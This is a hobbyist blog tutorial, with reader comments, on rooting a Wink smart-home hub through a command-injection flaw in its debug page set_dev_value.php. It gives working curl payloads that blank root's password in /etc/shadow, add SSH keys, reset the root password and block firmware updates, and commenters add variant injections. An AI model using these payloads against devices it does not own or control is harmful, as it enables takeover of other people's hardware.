Sunday, November 30, 2014

How to root your WINK hub - Step by Step tutorial

Recently bought a WINK hub on a sale from Homedepot almost for free on the Blackfriday sale. I liked the concept since it supports multiple radios like Zigbee, Z-Wave, Lutron 433, Kidde 433, Bluetooth & Wifi. I already own a Vera 3 and i wanted to use this as a secondary controller by rooting the hub. Vera3 is extremely good and reliable except the UI but it only supports Z-Wave which made me think why can't i hack this free device as my secondary controller and use some of the cheap Zigbee devices available in Lowes like their Door Sensor, Panic Button, etc.

I searched and found very few sites that talks about rooting this hub but the steps were not clear.  So i thought of putting my own steps,

#1. Looks like the Wink team has left some of the development debugging pages on the production release, which we will be leveraging to take control on this hub.

#2. After purchasing the hub DO NOT CONNET to the internet which will make the hub download the latest firmware where they have fixed the issue.

#3. Plugin the hub ( Don't worry it won't connect to the Wink Servers yet). Wait for the flashing pink lights to come up.( green -> flashing pink).

#4. Now connect your laptop to the Wifi SSID name WINKHUB-*

#5. Trying hitting the following url from your browser and make sure sure it works.

http://192.168.0.1 

and you should see this "home page". Perform the below steps while you are still connected to the hub.

#6.  I am using Mac, so i opened a terminal and issued a curl command as given below to disable the root account's password.

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

 This will take a minute so please be patient.

#7. Generate a ssh key now by typing the following commands on a terminal window,

$ssh-keygen -t rsa

press the enter key to accept the default location
Type a passphare when it prompts and confirm it by entering the passphare second time. Now the system generates the ssh key as shown below.

Your identification has been saved in /Users/username/.ssh/id_rsa.
Your public key has been saved in /Users/username/.ssh/id_rsa.pub.
The key fingerprint is:
bf:49:7f:cb:85:da:5a:f4:7c:1f:cc:23:dd:cc:55:f8 username@mac.local
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
|         .       |
|        A .      |
|   .   . o       |
|  o . . G .      |
| + + o . +       |
|. o o = o +      |
| o...o + o       |
|.  oo.o .        |
+-----------------+

#8. Now copy all the contents of your id_rsa.pub file(/Users/username/.ssh/id_rsa.pub) and encode the content using any of the online encoder. I used http://meyerweb.com/eric/tools/dencoder/

#9. Copy the encoded content from the website and issue the following curl command from the terminal prompt as below(after replacing the your_encoded_key ) to add your ssh key to the hub.

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;echo 'your_encoded_key' >> /root/.ssh/authorized_keys; cat /root/.ssh/authorized_keys;"

If the command is successful, it will list 2 rsa keys including the one that you just added.

#10.  Try to ssh into the hub using

root@192.168.0.1. 

#11. Now try editing the set_dev_value.php using,

$ vi /var/www/set_dev_value.php 

comment the line that starts with $cmd and add a new line as given below

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

if you have done it correctly the file should look like this,

$nodeId = $_POST['nodeId'];
$attrId = $_POST['attrId'];
$v = $_POST['value'];

//$who = exec('whoami');
//echo $who;
//passthru("sudo ls", $retval);

//echo "nodeId=" .$nodeId . " attrId=" . $attrId . " value=" . $v;
//$cmd = 'sudo ' . dirname(__FILE__) . '/php2apron set_value ' . $nodeId . " " .
$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;
//echo $cmd . " ";

passthru($cmd, $retval);
echo "ret_code=" . $retval;

?>

#12. We want to block the device from getting the new firmware by editing the host file located in /etc/hosts

and add the following entries in bold.

127.0.0.1       localhost
127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com
127.0.1.1       flex-dvt

#13. One more last step before we disconnect, edit the following file,

$vi /etc/init.d/S31platform 

and look for the following lines,

if [ ! -e /database/oauth ]; then                                   
    rm /database/wpa_supplicant.conf                            
fi

and edit the rm /database/wpa_supplicant.conf to rm /database/wpa_supplicant.conf1. I tried commenting the line but ran into issue. So i end up adding a 1 at the end, since the file anyway won't be there.

#13. Disconnect the ssh or open a new terminal and add your Wifi ssid/password using the following curl command by replacing the x's with your wifi's ssid and y's with your wifi's password.

curl "http://192.168.0.1/index.php" -d '{"ssid":"xxxxxxx","pass":"yyyyyyy"}'

#14. Now try rebooting the hub if everything goes well you should see a blue light which confirms that it works and try ssh into the hub and it should work like before.

Also try accessing the device page by visiting http://your-new-hub-ip/devices.php, which you will be using to add /remove devices.

this link was very useful when i was rooting my device.

If you brick your device you will see a flashing pink. Still you can access the hub through UART which is little hard and also you need some hardware. I will post the picture and pin configuration shortly. Here is my Part 2 where you will find information about getting the shell access to the wink hub through the UART using an FTDI board.

35 comments:

  1. Thanks for putting this out there. Hoping this hub full of radios can be used for something great and not reliant on Wink server.

    This is really cool.

    ReplyDelete
  2. Hi,
    Saw your page from the very long SD thread. Thanks for posting this! Does rooting this to make it not phone home still preserve all the control capabilities of the app? I guess I'm asking what the advantage of rooting is. Does the wink app still go to the wink server, which now has no access to your wink hub...so I'm not sure how the hub would function still.

    If there's a nice RESTful API that you can interface with, using a Raspberry Pi or maybe in your case Vera can run requests to the Wink? That would be nice. Anyways, really appreciate the clarity of this post. Would like to ask for more information on how this is useful, for those just getting into this.

    ReplyDelete
  3. I keep getting this when I try to enter in my SSID and password –

    Slim Application Errorbody{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}Slim Application ErrorThe application could not run because of the following error:DetailsType: ErrorExceptionCode: 8Message: Trying to get property of non-objectFile: /var/www/index.phpLine: 54Trace

    #0 /var/www/index.php(54): Slim\Slim::handleErrors(8, 'Trying to get p...', '/var/www/index....', 54, Array)
    #1 [internal function]: {closure}()
    #2 /var/www/Slim/Route.php(462): call_user_func_array(Object(Closure), Array)
    #3 /var/www/Slim/Slim.php(1326): Slim\Route->dispatch()
    #4 /var/www/Slim/Middleware/Flash.php(85): Slim\Slim->call()
    #5 /var/www/Slim/Middleware/MethodOverride.php(92): Slim\Middleware\Flash->call()
    #6 /var/www/Slim/Middleware/PrettyExceptions.php(67): Slim\Middleware\MethodOverride->call()
    #7 /var/www/Slim/Slim.php(1271): Slim\Middleware\PrettyExceptions->call()
    #8 /var/www/index.php(81): Slim\Slim->run()
    #9 {main}
    [1/2]: “ssid”:”ydkfl”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’ –>
    –_curl_–“ssid”:”ydkfl”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’
    curl: (6) Could not resolve host: “ssid”

    [2/2]: ”pass”:”QDXMJV24WJKCTBGV”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’ –>
    –_curl_–”pass”:”QDXMJV24WJKCTBGV”’
    curl “http://192.168.0.1/index.php” -d ”pass”:”QDXMJV24WJKCTBGV”’
    curl: (6) Could not resolve host: ”pass”

    ReplyDelete
    Replies
    1. @Matt, did you surround your ssid & password inside braces?

      curl "http://192.168.0.1/index.php" -d '{"ssid":"xxxxxx","pass":"yyyyy"}'

      Delete
    2. i have same issue i even changed ssid and switched to tkip. i still get that error anything else i can do
      ?

      Delete
    3. I copied the wpa_supplicant.conf file from /database_default to the /database folder and added my network info there. If you've made it this far, you can do the rest via SSH. You can run the aprontest command directly from the command line.

      Delete
    4. I had the same problem so I tried to follow this last step via SSH. I guess I bricked it since it flashes pink trying to connect to my (I assume) incorrectly set file. Is my only option now UART? (It doesn't advertise as an AP anymore)

      Can someone post an example supplicant file (WPA2-Personal with AES encryption) and confirm the location of the file.. please. (so close)

      Delete
    5. I had the same problem so I tried to follow this last step via SSH. I guess I bricked it since it flashes pink trying to connect to my (I assume) incorrectly set file. Is my only option now UART? (It doesn't advertise as an AP anymore)

      Can someone post an example supplicant file (WPA2-Personal with AES encryption) and confirm the location of the file.. please. (so close)

      Delete
    6. Ditto on the same error. I got nervous and decided to try to follow the regular user setup from there. On my smartphone I installed the Wink software, created an account, and added the hub. It prompted for the network password and eventually came up with an error. But that was fine, wasn't expecting it to complete anyway. I rebooted the Wink and it came up on my wireless network. Here is what I have for a WPA2 AES network. Note there are note quotes around the identifies as in the example above.

      [root@flex-dvt database]# cat wpa_supplicant.conf
      ctrl_interface=/var/run/wpa_supplicant
      update_config=1
      ap_scan=1
      fast_reauth=1

      network={
      ssid="XXX"
      psk="1234XXXX"
      }[root@flex-dvt database]#

      Delete
    7. My problem was similar, posting in case my solution helps. My PSK is already a 64 digit hex string, not a passphrase. In this case, the PSK string should not be enclosed in quotes in the wpa_supplicant.conf file, but if I try running the curl command without quotes, I get the same errors as you.

      So...if you're trying to pass an ascii passphrase and you get this error, maybe you forgot the quotes.

      If you're trying to pass a hex digit password, you still have to use the quotes...but first, go into /var/www/index.php and edit the script so that when it creates the file from your password, IT doesn't add quotes to the wpa_supplicant file when it creates it. Then issue the curl command, (be patient, it takes what seems like a long time to connect), and you should be good to go.

      I had no luck editing the wpa_supplicant.conf file or the database_default/wpa_supplicant.conf file directly. I suppose I could have spent more time with index.php to figure out what it was doing right, but this seemed to do the trick.

      Delete
  4. Abdul, awesome post. Thanks!

    ReplyDelete
  5. Very helpful post Abdul. I was able to follow all the instructions and now have the wink hub connected to my home wi-fi network and showing a solid blue light. Question is, if I go to the device page, I do not see any way to add/remove devices. It looks like it will display devices that are connected but nothing else. Did I miss a step? How do we enable that functionality?

    ReplyDelete
    Replies
    1. You have to use the aprontest utility to add devices. I have seen a youtube video on this, https://www.youtube.com/watch?v=UvzGu0pXBNI

      There are lot of people working on the apps for the rooted hub and i like this one,
      https://github.com/nashira/blink

      Delete
    2. Thanks. Helpful links to help me understand all these better. It did not cover how to add devices though. Also noticed your email address when querying the linux version. Did you work on the orginal implementation?

      Delete
  6. What should I see after the first curl command to disable root password? Mine take less than 5 seconds (not minute) and display a list of something including root. I went on with rsa key steps. Once doing ssh to the hub, still asking for root password. What did I do wrong? It is a brand new hub I just received. I made sure the hub not connected to the internet. Maybe the unit I got already patch with new OTA at the factory?

    ReplyDelete
    Replies
    1. Mine took only a few seconds as well. I still needed to enter the password that I used to generate the key to login.

      Delete
    2. what and how do you use to ssh into the wink? I used putty and winscp with and without the password I use to generate the rsa key and keep give me error: PuTTY error: "No supported authentication methods available". Thx

      Delete
    3. I used putty under windows - make sure in the SSH Auth section you have it referencing the file of your private key (matching the public key you uploaded). Then connect to 192.168.0.1 and when prompted for login enter root
      It should then connect.

      Delete
  7. When I execute
    curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;echo 'My encoded pubkey' >>/root/.ssh/authorized_keys; cat /root/.ssh/authorized_keys;"

    I keep getting: XML which cannot be posted
    but that has a title tag: 417 - Expectation Failed
    and h1 tag:417 - Expectation Failed
    in the body


    Any help is appreciated (curl on Win7).

    ReplyDelete
    Replies
    1. I am also having the same issue :(

      Delete
    2. same here, I've read the steps carefully a few times to no avail.

      Delete
    3. I also get "Expectation Failed" message at step #9

      Delete
    4. I was working from Windows, then switched to a Mac. I read it 1 more time. on the Mac there's a id_rsa.pub file which doesn't exist in windows

      Delete
  8. I rooted mine slightly differently I did:
    curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;sed -i 's/=-sg/=/' /etc/default/dropbear;reboot;"
    It avoids the ssh key and allows you to login with the default root credentials of root and "keep app" (no quotes)

    ReplyDelete
    Replies
    1. It didn't work for me, is there a different default password?

      Delete
  9. Thank you for the post. Here is my small contribution. Thank you @Berserko!

    #update dropbear (ssh server) to allow root login (disabled by default) and restart dropbear
    curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;sed -i 's/=-sg/=/' /etc/default/dropbear;/etc/init.d/S50dropbear restart;"

    #change root password to root
    curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;echo -e "root\nroot" | passwd;"

    ssh root@192.168.0.1

    Login with root as the password.

    No need for keys.

    ReplyDelete
    Replies
    1. @Qui Hong: Are your two command lines to be used *instead* of Abdul's step #6? Do I skip 7-9 as well? TIA

      Delete
  10. Root the latest Wink firmware with this howto:
    http://forum.xda-developers.com/showpost.php?p=57407353&postcount=1

    I may update it to use the methodology above so no ssh key is required... Hmmm...

    ReplyDelete
  11. howto root the latest Wink Hub firmware:
    http://forum.xda-developers.com/showpost.php?p=57407353&postcount=1

    I may update it using the above posts so no ssh key is required. Hmmm...

    ReplyDelete
  12. I 'm just reading this page but skip to here to ask some questions:
    After rooting and adding devices, can i connect to internet and control device remotely or LAN only ?
    Can i upgrade firmware after rooting?

    ReplyDelete
  13. I appears that at least as of Firmware 0.47, the method in the link posted by @Kent Hulick doesn't appear to work anymore either. Has anybody found any exploits that still work as of Firmware 0.47? Thanks.

    ReplyDelete
  14. Abdul, I found your page to help me root my new Wink hub. I think I found a way that improves on what you've done here. http://www.dinnovative.com/?p=348. This method avoids the clunky use of urlencoding and leverages some built-in tools (dropbearkey & dropbearconvert) found in the default Wink OS.

    ReplyDelete
  15. I get to the end, I see the blue light! After rebooting the Wink hub has now disappeared from my network as it is connecting to my home network. The address 192.168.0.1, obviously, no longer works. ???

    Help?

    ReplyDelete
  16. Can anyone help with the issues i am having? i have followed the instructions above and have been able to gain root access via ssh in to the Wink Hub, however it will not connect to my WiFi. When the hub reboots, it always defaults back to a "WINKHUB-XXXX" ssid. I can still gain access via ssh, however it fails to connect to my network Wifi. Router i am using is an Airport Extreme with WPA/WPA2.

    ReplyDelete
  17. Hi, I get up to step 10 in Arahuman's post and I get an error when I type in the [ssh root@192.168.0.1] command in terminal. I get a reply "Agent admitted failure to sign using the key". Need help! If I have to use putty, then which key do I use when I ssh using putty and if I need .ppk, how do I get .ppk file from .pub.

    ReplyDelete